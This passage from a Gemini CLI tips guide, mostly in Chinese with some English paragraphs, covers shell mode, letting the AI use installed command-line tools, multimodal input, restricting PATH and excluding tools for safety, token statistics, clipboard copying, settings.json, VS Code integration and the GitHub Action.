总结：随着会话变长，请使用 /compress 来保持性能和相关性。这有助于 Gemini CLI 专注于大局，而不是对话历史中的每一个细节。这样，你就可以进行马拉松式的调试会话或广泛的设计讨论，而不会耗尽 AI 正在书写的“思维纸张”。

技巧16: 用 `!` 执行 Shell 命令（和你的终端对话）

快速应用场景： 在 Gemini CLI 的任何时刻，你都可以在命令前加上 ! 来执行真实的 shell 命令。比如，你想查看 git 状态，直接输入 !git status 就会在你的终端中执行。这样就不用来回切换窗口或上下文了——你仍然在 Gemini CLI 中，但实际上是在告诉它”让我快速执行这个命令”。

这个技巧介绍的是 Gemini CLI 中的 Shell 模式。有两种使用方式：

单次命令： 在提示符前加上 !，后面跟上任何命令和参数。这会在当前工作目录执行该命令，并直接显示输出结果。例如：

!ls -lh src/

会列出 src 目录中的文件，输出效果和正常终端一样。输出完成后，Gemini 提示符会重新出现，你可以继续聊天或执行更多命令。

持续 Shell 模式： 如果只输入 ! 并按回车，Gemini CLI 会切换到一个子模式，出现 shell 提示符（通常显示为 shell> 或类似形式）。现在你可以交互式地输入多个 shell 命令。这基本上就是 CLI 内置的一个迷你终端。再次输入 !（或 exit）就可以退出这个模式。例如：

!
shell> pwd
/home/alice/project
shell> python --version
Python 3.x.x
shell> !

最后一个 ! 之后，你就回到了正常的 Gemini CLI。

这有什么用？ 因为开发工作本身就是在操作和询问之间不断切换。你可能正在和 AI 讨论某个问题，突然需要编译代码或运行测试来验证什么。不用离开对话，你就能快速完成操作，然后把结果反馈给聊天。事实上，Gemini CLI 本身也经常在工具使用中这样做（比如你要求修复测试时，它可能会自动运行 !pytest）。但作为用户，你完全可以手动控制。

实际例子：

Gemini 建议修改代码后，你可以用 !npm run build 检查是否能编译通过，然后复制任何错误信息让 Gemini 帮忙解决。
想用 vim 或 nano 打开文件？你甚至可以通过 !nano filename 来启动（不过要注意，由于 Gemini CLI 有自己的界面，在里面使用交互式编辑器可能有点别扭——最好还是用内置的编辑器集成或复制到你的编辑器中）。
可以用 shell 命令为 AI 收集信息：比如用 !grep TODO -R . 找到项目中所有的 TODO，然后让 Gemini 帮忙处理这些待办事项。
或者简单用于环境任务：需要时用 !pip install some-package 安装包，都不用离开 CLI。

无缝交互： 一个很酷的特性是，对话内容可以直接引用命令输出。比如，你可以用 !curl http://example.com 获取一些数据，看到输出后，立即对 Gemini 说”把上面的输出格式化成 JSON”——因为输出内容显示在聊天中，AI 就有了处理它的上下文（只要内容不太大）。

将终端作为默认 Shell： 如果你发现自己总是在命令前加 !，其实可以把 shell 模式设为默认。一种方法是用特定工具模式启动 Gemini CLI（有默认工具的概念）。但更简单的方法：如果你计划运行大量手动命令而只是偶尔和 AI 交流，就在会话开始时直接进入 shell 模式（只输入 !）。然后你想提问时随时退出 shell 模式。这就像把 Gemini CLI 变成了你的正常终端，只是恰好有个 AI 随时待命。

与 AI 规划的集成： 有时 Gemini CLI 本身会建议运行某个 shell 命令。如果你同意，效果就和你手动输入 !command 一样。理解了这一点，你就知道可以随时干预。如果 Gemini 卡住了或者你想尝试什么，不用等它建议——你直接做就是，然后继续。

总而言之，! 透传机制意味着你不需要为了 shell 任务离开 Gemini CLI。它打破了和 AI 聊天与执行系统命令之间的界限。作为专业用户，这对效率来说太棒了——你的 AI 和你的终端成了一个持续的工作环境。

技巧17：将每个 CLI 工具视为潜在的 Gemini 工具

快速使用场景： Gemini CLI 可以利用您系统上安装的任何命令行工具解决问题。AI 可以访问 shell，所以如果您有 cURL、ImageMagick、git、Docker 或任何其他工具，Gemini 可以在适当时调用它。换句话说，您的整个 $PATH 是 AI 的工具包。这极大地扩展了它能做的事情——远超出了其内置工具的范围。

例如，假设您问：”将此文件夹中的所有 PNG 图像转换为 WebP 格式。”如果您安装了 ImageMagick 的 convert 实用程序，Gemini CLI 可能计划类似于：为每个文件使用带有 convert 命令的 shell 循环。确实，之前一篇博客的示例显示了这一点，其中用户提示批量转换图像，Gemini 使用 convert 工具执行了一个 shell 单行命令。
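As a rough illustration of the kind of batch command described above, the Python sketch below builds one ImageMagick convert invocation per PNG file. The helper name webp_commands is hypothetical, and it only assembles the commands rather than running them, so it does not claim to show what Gemini CLI itself would generate.

```python
from pathlib import Path


def webp_commands(folder):
    """Build one `convert in.png out.webp` argument list per PNG in folder.

    Hypothetical helper for illustration; it does not execute anything.
    """
    commands = []
    for png in sorted(Path(folder).glob("*.png")):
        # with_suffix swaps only the final extension: photo.png -> photo.webp
        commands.append(["convert", str(png), str(png.with_suffix(".webp"))])
    return commands
```

Each returned list could be passed to subprocess.run(cmd, check=True) once ImageMagick is installed.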

另一个场景：”将我的应用程序部署到 Docker。”如果存在 Docker CLI，AI 可以根据需要调用 docker build 和 docker run 步骤。或者”使用 FFmpeg 从 video.mp4 提取音频”——它可以构建 ffmpeg 命令。

这个技巧是关于心态：Gemini 不仅限于工具内部已有的功能（这已经相当广泛）。它可以弄清楚如何使用其他可用的程序来实现目标。它知道常见的语法，如果需要可以读取帮助文本（它可以在工具上调用 --help）。唯一的限制是安全性：默认情况下，它会对它想到的任何 run_shell_command 请求确认。但当您变得舒适时，您可能允许某些良性命令自动执行（请参阅 YOLO 或允许工具配置）。

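Note: "With great power comes great responsibility." Because every shell tool is fair game, make sure your $PATH does not contain anything you would not want the AI to run by accident. This is where Tip 19 (customizing $PATH) comes in: some users create a restricted $PATH for Gemini so that it cannot, say, call destructive system commands directly, or invoke gemini recursively (to avoid loops). The point is that by default, if gcc, terraform, or anything else is on $PATH, Gemini can call it. That does not mean it will do so at random, only when a task calls for it, but it is possible.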

思维过程示例： 想象一下你让 Gemini CLI：”搭建一个基础的 HTTP 服务器来提供当前目录的服务。”AI 可能会想：”我可以用 Python 内置的服务器来实现这个功能。”然后它会执行 !python3 -m http.server 8000 命令。看，它就这样使用了系统工具（Python）来启动服务器。这只是一个无害的例子。再比如：”检查这个 Linux 系统的内存使用情况。”AI 可能会使用 free -h 命令或者读取 /proc/meminfo 文件。它实际上就是通过使用可用的命令来执行系统管理员会做的事情。

所有工具都是 AI 能力的延伸：这听起来有点未来感，但不妨这样理解：任何命令行程序都可以看作是 AI 可以调用来扩展自身能力的”函数”。需要解决数学问题？它可以调用 bc （计算器）。需要处理图像？它可以调用图像处理工具。需要查询数据库？只要安装了相应的客户端并且有访问凭据，它就能使用。可能性是无限的。在其他 AI 代理框架中，这被称为工具使用，而 Gemini CLI 的设计充分信任其代理能够选择合适的工具。

当出错时： 但另一方面，如果 AI 误解了某个工具或者对它产生了幻觉，就可能尝试调用不存在的命令，或者使用错误的参数，从而导致错误。不过这不是什么大问题——你会看到错误信息，可以及时纠正或澄清。实际上，Gemini CLI 的系统提示很可能指导它先进行”试运行”（只是提出命令建议）而不是盲目执行，所以你通常有机会及时发现这些问题。随着时间的推移，开发者们也在不断改进工具选择逻辑，以减少这些失误。

核心要点是：要把 Gemini CLI 想象成一把超强的瑞士军刀——不仅有自带的刀片，更包含了你操作系统中的每一个工具。对于标准程序，你不需要专门指导它如何使用；通常它自己就懂，或者能快速搞明白。这极大地扩展了你能完成的任务范围。就像拥有了一个熟悉如何运行你安装的几乎所有程序的初级开发者或运维工程师。

作为专业用户，你甚至可以安装额外的命令行工具来赋予 Gemini 更强大的能力。比如说，如果你安装了云服务的命令行工具（AWS CLI、GCloud CLI 等），理论上只要给出相应提示，Gemini 就能利用它们来管理云资源。当然，一定要确保你理解并信任执行的命令，特别是使用那些功能强大的工具时（你肯定不希望它意外启动庞大的云实例）。但只要使用得当，这个理念——一切皆可为 Gemini 工具——就是让它融入你的环境后能力呈指数级增长的关键所在。

Tip 18: Use Multimodal Features - Let Gemini See Images and More

快速使用场景： Gemini CLI 不仅限于文本处理，它还是多模态的。这意味着它可以分析图像、图表，甚至 PDF 文件（只要你提供）。充分利用这一点吧。比如说，你可以说：”这是一个错误对话框的截图， @./error.png - 帮我排查一下这个问题。”AI 就会”看见”这张图片并给出相应的回应。

Google Gemini 模型（以及其前身 PaLM2 的 Codey 形式）的突出特性之一就是图像理解能力。在 Gemini CLI 中，当你用 @ 引用图像时，模型会接收到图像数据。它可以输出描述、分类，或对图像内容进行推理。我们已经讨论过根据内容重命名图像（技巧 14）和描述截图（技巧 7）。但让我们看看其他一些有创意的用法：

UI/UX 反馈： 如果你是和设计师一起工作的开发者，你可以直接把UI设计图丢给Gemini，让它来反馈意见或者生成代码。比如，你可以说：”看看这个UI原型 @mockup.png ，然后为它生成一个React组件结构。”Gemini能够识别图中的各种元素（比如标题栏、按钮等），然后为你规划出相应的代码结构。
图片整理： 除了重命名，如果你有一堆杂乱的图片文件夹，想要按内容进行分类整理，可以说：”把 ./photos/ 文件夹里的图片按主题分类到子文件夹中（比如日落、山脉、人物等）。”AI会逐一查看每张照片并对其进行分类（这和很多相册App用AI自动整理图片的功能类似 - 现在你可以通过Gemini用自己的脚本来实现了）。
OCR 和数据提取： 如果你有错误信息的截图或者文档的照片，Gemini通常能从中读取文字。比如，”从 invoice.png 中提取文本并整理成结构化格式。”正如Google Cloud博客中的一个例子所示，Gemini CLI可以处理一组发票图片，并输出包含这些发票信息的表格。它基本上完成了OCR识别+内容理解，从发票图片中提取出发票号、日期、金额等信息。这是一个高级用例，但在底层多模态模型的支持下是完全可以实现的。
理解图形或图表： 如果你有图表截图，可以问：”解读下这张图的关键信息 @chart.png 。”它可能会帮你解读坐标轴和数据趋势。虽然准确性可能会有差异，但这是一个很值得尝试的便捷功能。

为了能实际应用：当您使用 @image.png 引用图片时，请确保图片不要过大（尽管模型能够处理尺寸合理的图片）。CLI工具会将图片进行编码并发送给模型处理。响应结果可能会包含图片描述或相关操作建议。您还可以在同一个提示中混合使用文本和图片引用。

非图像模态： CLI工具和模型还可以处理PDF和音频文件，通过内部工具进行转换。例如，当您引用 @report.pdf 时，Gemini CLI会在后台使用PDF转文本工具来提取内容并生成摘要。如果您引用 @audio.mp3 并要求转录，它可能会调用音频转文本工具（如语音识别功能）。速查表显示支持引用PDF、音频和视频文件，这应该是通过调用相应的内部工具或API来实现的。因此，像”转录这段访谈音频： @interview.wav “这样的命令实际上是可行的（即使现在不行，很可能很快就会支持，因为底层的Google语音转文本API可以集成进来）。

丰富输出格式：多模态也意味着AI可以在响应中返回图像内容（如果进行了相关集成）。不过在CLI环境中，通常不会直接显示图像，但可能会保存图片文件或输出ASCII艺术等形式。之前提到的MCP功能表明，工具能够返回图像数据。例如，AI绘图工具可以生成图像，然后Gemini CLI可以通过打开文件或提供链接的方式来呈现这张图片。

重要提示： CLI工具本身是基于文本的，所以您无法在终端中直接看到图像（除非支持ASCII预览功能）。您只会获得对图像的分析结果。因此，这主要是为了读取图像内容，而不是显示图像。如果您使用的是VS Code集成环境，那么图片可能会在聊天视图中显示出来。

总而言之，使用Gemini CLI时不要忘记GUI中的”I”（Interface） - 在很多情况下，它能很好地处理图像信息，就像处理文本一样轻松。这开启了许多工作流程，比如可视化调试、设计辅助、从截图中提取数据等，所有这些都可以在同一个工具中完成。这是其他一些CLI工具目前可能不具备的差异化优势。随着模型的不断改进，这种多模态支持将变得更加强大，因此掌握这项技能是一项面向未来的能力。

Tip 19: Customize `$PATH` (and Tool Availability) for Stability

快速使用场景： 如果您发现Gemini CLI出现混乱或调用了错误的程序，可以考虑使用定制的 $PATH 环境变量来运行它。通过限制或排序可执行文件的访问顺序，您可以防止AI调用到意料之外的同名脚本。从本质上说，您就是将其工具访问限制在一个可信的沙盒环境中，只允许使用已知安全的工具。

对大多数用户来说，这并不是什么问题，但对于拥有大量自定义脚本或多个工具版本的专业用户来说，这可能会很有帮助。开发者提到的一个原因是避免无限循环或奇怪的行为。例如，如果 gemini 命令本身就在 $PATH 中，失控的AI可能会在Gemini内部递归调用 gemini （虽然这是个奇怪的场景，但理论上是有可能的）。又或者您有一个名为 test 的命令与其他工具产生了冲突——AI可能会调用到错误的那个命令。

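How to set PATH for Gemini: the simplest way is to set it inline at launch:

PATH=/usr/bin:/usr/local/bin gemini

Run this way, Gemini CLI sees only the listed directories on its $PATH, so you can leave out directories that hold experimental or dangerous scripts. The listed directories must still contain gemini itself and the Node.js runtime it depends on. Alternatively, create a small shell wrapper script that cleans up or adjusts $PATH and then executes gemini.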
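The wrapper idea can be sketched in Python as well. This is a minimal sketch under stated assumptions: the function names build_safe_path and launch_gemini are hypothetical, and the allowlist of directories is whatever you choose to trust. It keeps only allowlisted directories that are already on PATH, then replaces the current process with gemini.

```python
import os
import shutil


def build_safe_path(allowed_dirs, current_path=None):
    """Return a PATH string limited to allowlisted directories, in allowlist order."""
    if current_path is None:
        current_path = os.environ.get("PATH", "")
    present = {p for p in current_path.split(os.pathsep) if p}
    return os.pathsep.join(d for d in allowed_dirs if d in present)


def launch_gemini(allowed_dirs):
    """Replace this process with gemini, running under the restricted PATH."""
    # Resolve gemini with the full PATH first, before restricting it.
    gemini = shutil.which("gemini")
    if gemini is None:
        raise FileNotFoundError("gemini not found on PATH")
    env = dict(os.environ)
    env["PATH"] = build_safe_path(allowed_dirs)
    os.execve(gemini, [gemini], env)
```

Calling launch_gemini(["/usr/bin", "/usr/local/bin"]) mirrors the inline example; the allowlist still needs to include the directory that holds node.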

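Another approach is to disable specific tools explicitly through environment variables or configuration. For example, if you never want the AI to use rm or another destructive tool, you could in theory put an alias or a no-op rm in the safe $PATH (this can interfere with normal operation, so it is not really recommended). A better way is an exclusion list in your settings. In an extension or in settings.json you can exclude specific tool names. For example:

"excludeTools": ["run_shell_command"]

This extreme example blocks all shell command execution (making Gemini effectively read-only). Finer-grained controls exist for skipping confirmation prompts on specific commands; in the same spirit, you might exclude specific commands with a configuration along these lines:

"tools": {
  "exclude": ["apt-get", "shutdown"]
}

(This syntax is illustrative; see the documentation for exact usage.)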

其原理是，通过控制环境来降低AI使用不当工具造成失误的风险。这就类似于给家里做儿童安全防护。

防止无限循环： 有个用户遇到过Gemini不断读取自己的输出或重复读取文件的无限循环情况。自定义 $PATH 无法直接修复逻辑循环，但其中一个原因可能是AI调用了某个命令而触发了自身调用。确保它不会意外启动另一个AI实例（比如AI决定调用 bard 或 gemini 命令）是很重要的做法。将那些命令从 $PATH 中移除（或者在当前会话中重命名它们）就能帮助避免这种情况。

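Isolation via sandbox: besides modifying $PATH, another option is the --sandbox mode (which runs tools in an isolated environment using Docker or Podman). In that case everything the AI does is confined to the container, and it can use only the tools present in the sandbox image. You can supply a curated Docker image containing a specific toolset. This is more heavyweight, but very secure.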

为特定任务自定义 PATH：你可以为不同项目设置不同的 $PATH 配置。例如，在一个项目中，你希望使用特定版本的 Node.js 或本地工具链。使用指向这些版本的 $PATH 来启动 gemini ，就能确保 AI 使用正确的版本。本质上，要把 Gemini CLI 当作普通用户看待——它使用你提供的任何环境。因此，如果你需要它选择 gcc-10 而不是 gcc-12 ，相应地调整 $PATH 或 CC 环境变量即可。

总结来说：给Gemini CLI设置防护栏。作为高级用户，你能够微调 AI 的运行环境。如果你发现某种不良行为模式与工具使用相关，调整 $PATH 就是快速解决方案。日常使用中你可能不需要这样做，但这是一个专业技巧，值得在将 Gemini CLI 集成到自动化或 CI 环境时记住：给它一个受控的环境。这样你就能确切知道它能做什么和不能做什么，从而提高可靠性。

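Tip 20: Track and Reduce Token Spend with Token Caching and Stats

If you run long conversations or repeatedly attach the same large files, you can cut cost and latency by using token caching and monitoring usage. With API key or Vertex AI authentication, Gemini CLI automatically reuses previously sent system instructions and context, which makes follow-up requests cheaper. You can see the savings live in the CLI.

How to use it

Choose an authentication mode that enables caching. Token caching is available with a Gemini API key or Vertex AI authentication. OAuth login does not currently support it. See the Google Gemini documentation.

Check your usage and cache hits. Run the /stats command during a session. It shows total tokens, plus a cached field when caching is active.

/stats

The command's description and its cache reporting behavior are documented in the command reference and the FAQ.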

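Capture metrics in scripts. When running headless, output JSON and parse the stats block, which includes tokens.cached for each model:

gemini -p "Summarize README" --output-format json

The headless guide documents the JSON schema, including cached token counts: https://google-gemini.github.io/gemini-cli/docs/cli/headless.html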
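Parsing that JSON might look roughly like the Python sketch below. It assumes the stats block is shaped as stats.models.<model>.tokens with prompt and cached counts; treat that layout, the function name cached_token_report, and the sample payload as assumptions and check them against the headless guide before relying on this.

```python
import json


def cached_token_report(raw_json):
    """Summarise prompt vs cached tokens per model from headless JSON output.

    Assumes the layout stats -> models -> <name> -> tokens -> {prompt, cached}.
    """
    data = json.loads(raw_json)
    models = data.get("stats", {}).get("models", {})
    report = {}
    for name, info in models.items():
        tokens = info.get("tokens", {})
        prompt = tokens.get("prompt", 0)
        cached = tokens.get("cached", 0)
        # Avoid dividing by zero when a model reports no prompt tokens.
        ratio = cached / prompt if prompt else 0.0
        report[name] = {"prompt": prompt, "cached": cached, "hit_ratio": ratio}
    return report


# Made-up payload for illustration only; not real CLI output.
sample = json.dumps(
    {"stats": {"models": {"example-model": {"tokens": {"prompt": 2000, "cached": 500}}}}}
)
```

In a script, the raw_json argument would be the stdout captured from the gemini command above.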

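Save a session summary to a file. For CI or budget tracking, write the JSON session summary to disk.

gemini -p "Analyze logs" --session-summary usage.json

With API key or Vertex authentication, the CLI automatically reuses previously sent context, so later turns send fewer tokens. Keeping GEMINI.md and large file references stable across turns improves the cache hit rate; you will see the effect in the stats as cached tokens.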

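Tip 21: Use /copy for Quick Clipboard Copy

Quick use-case: instantly copy the latest answer or code snippet from Gemini CLI to the system clipboard, without extra formatting or line numbers. This is ideal for pasting AI-generated code into your editor or sharing results with teammates.

When Gemini CLI gives an answer (especially a multi-line code block), you often want to reuse it elsewhere. The /copy slash command makes this effortless: it copies the CLI's last output straight to the clipboard. Unlike manual selection (which may pick up line numbers or prompt text), /copy takes only the raw response content. For example, if Gemini has just generated a 50-line Python script, typing /copy puts the whole script on the clipboard, ready to paste, with no scrolling or text selection. Under the hood, Gemini CLI uses the clipboard tool appropriate for your platform (for example pbcopy on macOS, clip on Windows). After running the command you will usually see a confirmation message, and you can then paste the copied text wherever you need it.

How it works: /copy requires a clipboard tool on your system. On macOS and Windows the required tools (pbcopy and clip respectively) are usually preinstalled. On Linux you may need to install xclip or xsel for /copy to work. Once that is in place, you can use /copy any time after Gemini CLI outputs an answer. It captures the entire last response (even a long one) and omits any internal numbering or formatting the CLI may show on screen. This spares you from cleaning up stray artifacts when moving content around. It is a small feature, but it saves a lot of time when you iterate on code or assemble AI-generated reports.

Tip: if /copy does not work, check that a clipboard tool is installed and accessible. For example, Ubuntu users can run sudo apt install xclip to enable clipboard copying. Once set up, /copy lets you share Gemini's output with zero friction.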

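Tip 22: Master Ctrl+C for Shell Mode and Exiting

Quick use-case: cleanly interrupt Gemini CLI or leave shell mode with a single keypress, and press twice in quick succession to exit the CLI entirely, all with Ctrl+C.

Gemini CLI behaves like a REPL, so knowing how to interrupt it is essential. Pressing Ctrl+C once cancels the current operation or clears whatever you have started typing, acting as an "abort" command. For example, if the AI is generating a lengthy answer and you have seen enough, press Ctrl+C and generation stops immediately. If you have started typing a prompt and want to discard it, Ctrl+C clears the input line so you can start over. And if you are in shell mode (entered by typing ! to run shell commands), a single Ctrl+C exits shell mode and returns you to the normal Gemini prompt (it sends an interrupt signal to the running shell process). This is extremely handy when a shell command hangs or you just want to get back to AI mode.

Pressing Ctrl+C twice in a row is the shortcut for exiting Gemini CLI completely. Think of it as "Ctrl+C once to cancel, Ctrl+C again to exit." The double press signals the CLI to end the session (you will see a goodbye message or the program closing). It is faster than typing /quit or closing the terminal window, and lets you shut the CLI down gracefully from the keyboard. Note that a single Ctrl+C will not exit if there is input to clear or an operation to interrupt; a second press (while the prompt is idle) is needed to exit fully. This design prevents you from closing the session by accident when you only meant to stop the current output.

Tip: in shell mode you can also press Esc to leave shell mode and return to Gemini's chat mode without terminating the CLI. If you prefer a more formal exit, the /quit command is always available and ends the session cleanly. Unix users can also press Ctrl+D (EOF) at an empty prompt to exit; Gemini CLI will ask for confirmation if needed. For most cases, though, mastering the single and double Ctrl+C is the fastest way to stay in control.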
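The Ctrl+C rules described in this tip can be modelled as a tiny state machine. The Python sketch below is a toy model written for illustration, not Gemini CLI's actual implementation; the Session class, its fields, and the returned action strings are all hypothetical.

```python
from dataclasses import dataclass


@dataclass
class Session:
    busy: bool = False        # an operation (generation, shell command) is running
    input_text: str = ""      # text typed at the prompt but not yet submitted
    shell_mode: bool = False  # inside the `!` shell sub-mode
    exit_armed: bool = False  # the previous key press was a Ctrl+C


def press_ctrl_c(s):
    """Apply one Ctrl+C to the session and return the action taken."""
    if s.busy:
        s.busy = False
        action = "cancelled operation"
    elif s.input_text:
        s.input_text = ""
        action = "cleared input"
    elif s.shell_mode:
        s.shell_mode = False
        action = "left shell mode"
    elif s.exit_armed:
        return "exit"
    else:
        action = "press again to exit"
    # Any Ctrl+C that did not exit arms the next idle press to exit.
    s.exit_armed = True
    return action
```

The model captures the key property from the text: a press that has something to cancel never exits, and only a following press at an idle prompt does.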

Tip 23: Customize Gemini CLI with settings.json

快速使用场景：通过编辑 settings.json 配置文件来调整 CLI 的行为和外观，以符合你的偏好或项目约定，而不是固守一刀切的默认设置。这让你能够在所有会话中强制执行主题、工具使用规则或编辑器模式等设置。

Gemini CLI 是高度可配置的。在用户主目录（ ~/.gemini/ ）或项目文件夹（仓库内的 .gemini/ ）中，你可以创建 settings.json 文件来覆盖默认设置。几乎 CLI 的每个方面都可以在这里调整——从视觉主题到工具权限。CLI 会合并多个级别的设置：系统范围的默认设置、用户设置和项目特定设置（项目设置会覆盖用户设置）。例如，你可能有一个全局的深色主题偏好，但某个特定项目可能需要更严格的工具沙盒限制；你可以通过在不同级别的 settings.json 文件来处理这种情况。
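The precedence described above (system defaults, then user settings, then project settings) can be illustrated with a short Python sketch. It assumes a simple key-by-key merge in which later layers win; the real CLI may treat nested objects differently, and merge_settings is a hypothetical name.

```python
def merge_settings(*layers):
    """Merge settings dicts in order; keys in later layers override earlier ones."""
    merged = {}
    for layer in layers:
        merged.update(layer)
    return merged


# Illustrative values only, ordered from most general to most specific.
system_defaults = {"theme": "Default", "vimMode": False}
user_settings = {"theme": "GitHub", "vimMode": True}
project_settings = {"sandbox": "docker", "vimMode": False}

effective = merge_settings(system_defaults, user_settings, project_settings)
```

Here the project layer overrides vimMode from the user layer, while the user's theme survives because the project does not set one.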

在 settings.json 内部，选项以 JSON 键值对的形式指定。以下是一个展示一些有用自定义配置的代码片段:

{
"theme": "GitHub",
"autoAccept": false,
"vimMode": true,
"sandbox": "docker",
"includeDirectories": ["../shared-library", "~/common-utils"],
"usageStatisticsEnabled": true
}

在这个例子中，我们将主题设置为 “GitHub”（一种流行的配色方案），禁用 autoAccept （这样 CLI 在运行可能有潜在影响的工具前总是会询问），启用输入编辑器的 Vim 键绑定，并强制使用 Docker 进行工具沙盒化。我们还在工作区上下文中添加了一些目录（ includeDirectories ），这样 Gemini 默认就能看到共享路径中的代码。最后，我们将 usageStatisticsEnabled 保持为 true 来收集基本使用统计（如果启用了遥测，这会提供数据支持）。还有更多可用设置——比如定义自定义颜色主题、调整令牌限制，或列入白名单/黑名单特定工具——所有这些都记录在配置指南中。通过调整这些设置，你可以确保 Gemini CLI 为你的工作流程表现最佳（例如，一些开发者为了效率总是希望开启 vimMode ，而其他人可能更喜欢默认编辑器）。

编辑设置的一个便捷方式是通过内置的设置 UI。在 Gemini CLI 中运行命令 /settings，它会为你的配置打开一个交互式编辑器。这个界面让你可以浏览和搜索带描述的设置，并通过验证输入来防止 JSON 语法错误。你可以通过友好的菜单调整颜色、切换 yolo（自动批准）等功能、调整检查点（文件保存/恢复行为）等。更改会保存到你的 settings.json，有些更改会立即生效（其他可能需要重启 CLI）。

提示： 为不同需求维护单独的项目特定 settings.json 文件。例如，在团队项目中你可能设置 "sandbox": "docker" 和 "excludeTools": ["run_shell_command"] 来锁定危险操作，而个人项目可能允许直接 shell 命令。Gemini CLI 会自动在项目目录树中找到最近的 .gemini/settings.json 并将其与你的全局 ~/.gemini/settings.json 合并。另外，别忘了你可以快速调整视觉偏好：尝试使用 /theme 交互式切换主题而无需编辑文件，这对于找到舒适的外观很棒。一旦找到喜欢的主题，就把它放入 settings.json 使其永久生效。

Tip 24: Use the IDE Integration (VS Code) for Context and Diffs

快速使用场景： 通过将 Gemini CLI 链接到 VS Code 来增强其功能——CLI 会自动知道你正在处理哪些文件，甚至会在 VS Code 的差异编辑器中为你打开 AI 提供的代码更改。这在 AI 助手和你的编码工作空间之间创建了无缝循环。

Gemini CLI 的强大功能之一是它与 Visual Studio Code 的 IDE 集成。通过在 VS Code 中安装官方的 Gemini CLI Companion 扩展并连接它，你允许 Gemini CLI 对你的编辑器变得”上下文感知”。这在实践中意味着什么？当连接时，Gemini 知道你打开的文件、当前光标位置，以及你在 VS Code 中选择的任何文本。所有这些信息都会输入到 AI 的上下文中。所以如果你问”解释这个函数”，Gemini CLI 可以看到你高亮的确切函数并给出相关答案，而无需你将代码复制粘贴到提示中。该集成共享最多你最近打开的 10 个文件，加上选择和光标信息，让模型对你的工作空间有丰富的理解。

另一个巨大优势是代码更改的原生差异比较。当 Gemini CLI 建议修改你的代码时（例如，”重构这个函数”并生成补丁），它可以自动在 VS Code 的差异查看器中打开这些更改。你会在 VS Code 中看到并排的差异视图，显示建议的编辑。然后你可以使用 VS Code 熟悉的界面来检查更改、进行任何手动调整，甚至通过单击接受补丁。CLI 和编辑器保持同步——如果你在 VS Code 中接受差异，Gemini CLI 会知道并在应用这些更改后继续会话。这个紧密循环意味着你不再需要将代码从终端复制到编辑器；AI 的建议直接流入你的开发环境。

如何设置： 如果你在 VS Code 的集成终端中启动 Gemini CLI，它会检测到 VS Code 并通常会提示你自动安装/连接扩展。如果你同意，它将运行必要的 /ide install 步骤。如果你没有看到提示（或稍后启用），只需打开 Gemini CLI 并运行命令：/ide install。这将为你获取并安装”Gemini CLI Companion”扩展到 VS Code 中。接下来，运行 /ide enable 建立连接——CLI 然后会指示它已链接到 VS Code。你可以随时使用 /ide status 验证，它会显示是否已连接并列出正在跟踪的编辑器和文件。从那时起，Gemini CLI 将自动从 VS Code 接收上下文（打开的文件、选择），并在需要时在 VS Code 中打开差异。它本质上将 Gemini CLI 变成一个存在于你的终端中但完全了解你的 IDE 的 AI 结对程序员。

目前，VS Code 是此集成的主要支持编辑器。（其他支持 VS Code 扩展的编辑器，如 VSCodium 或通过插件的一些 JetBrains，可能通过相同的扩展工作，但目前官方支持的是 VS Code。）不过设计是开放的——有 IDE Companion 规范用于与其他编辑器开发类似的集成。所以未来我们可能会看到对像 IntelliJ 或 Vim 等 IDE 的一流支持，通过社区扩展实现。

提示： 连接后，你可以使用 VS Code 的命令面板来控制 Gemini CLI 而无需离开编辑器。例如，按 Ctrl+Shift+P（Mac 上为 Cmd+Shift+P）并尝试像 “Gemini CLI: Run”（在终端中启动新的 CLI 会话）、“Gemini CLI: Accept Diff”（批准并应用打开的差异）或 “Gemini CLI: Close Diff Editor”（拒绝更改）等命令。这些快捷键可以进一步简化你的工作流程。而且记住，你不必总是手动启动 CLI——如果你启用了集成，Gemini CLI 本质上就成为了 VS Code 内部的 AI 协同开发者，观察上下文并在你处理代码时随时准备提供帮助。

Tip 25: Automate Repository Tasks with `Gemini CLI GitHub Action`

快速应用场景： 让 Gemini 在 GitHub 上发挥作用 - 使用 Gemini CLI GitHub Action 来自动分类新 issue 和审查仓库中的拉取请求，就像一个 AI 团队成员一样处理日常开发任务。

Gemini CLI 不仅仅适用于交互式终端会话；它还可以通过 GitHub Actions 在 CI/CD 流水线中运行。Google 提供了一个现成的 Gemini CLI GitHub Action（目前处于测试阶段），可以集成到您仓库的工作流中。这实际上是在 GitHub 上的项目中部署了一个 AI 代理。它在后台运行，由仓库事件触发。

例如，当有人提交一个新的 issue 时，Gemini Action 会自动分析 issue 描述，应用相关标签，甚至确定其优先级或建议可能的重复项（这就是”智能 issue 分类”工作流）。当开启 pull request 时，Action 会启动并提供 AI 代码审查 - 它会在 PR 上评论，提供关于代码质量、潜在错误或风格改进的见解。这让维护者在任何人工查看之前就能获得对 PR 的即时反馈。

或许最酷的功能是 on-demand collaboration(按需协作)：团队成员可以在 issue 或 PR 评论中提及 @gemini-cli 并给出指令，比如”@gemini-cli 请为此编写单元测试”。Action 会接收到这个信息，Gemini CLI 会尝试完成请求（例如，通过添加包含新测试的提交）。这就像在您的仓库中有一个 AI 助手，随时准备在需要时处理杂务。

设置 Gemini CLI GitHub Action 非常简单。首先，确保您在本地安装了 0.1.18 或更高版本的 Gemini CLI（这确保了与 Action的兼容性）。然后，在 Gemini CLI 中运行特殊命令：/setup-github。这个命令会在您的仓库中生成必要的工作流文件（如果需要，它会引导您完成身份验证）。具体来说，它会在 .github/workflows/ 目录下添加 YAML 工作流文件（用于 issue 分类、PR 审查等）。

您需要将 Gemini API 密钥添加到仓库的机密信息中（作为 GEMINI_API_KEY），这样 Action 就可以使用 Gemini API。一旦完成并提交了工作流，GitHub Action 就会启动 - 从那一刻起，Gemini CLI 将根据这些工作流自主响应新的 issue 和 PR。

由于这个 Action 本质上是以自动化方式运行 Gemini CLI，您可以像自定义 CLI 一样自定义它。默认设置包含三个工作流（issue 分类、PR 审查和通用的提及触发助手），这些工作流是完全开源且可编辑的。您可以调整 YAML 来修改 AI 的行为，甚至添加新的工作流。

例如，您可以创建一个夜间工作流，使用 Gemini CLI 扫描仓库中的过期依赖项，或基于最近的代码更改更新 README - 可能性是无穷的。这里的关键好处是将繁琐或耗时的任务交给 AI 代理处理，让人类开发者可以专注于更困难的问题。而且由于它在 GitHub 的基础设施上运行，不需要您的干预 - 它真正是一个”设置即忘记”的 AI 助手。

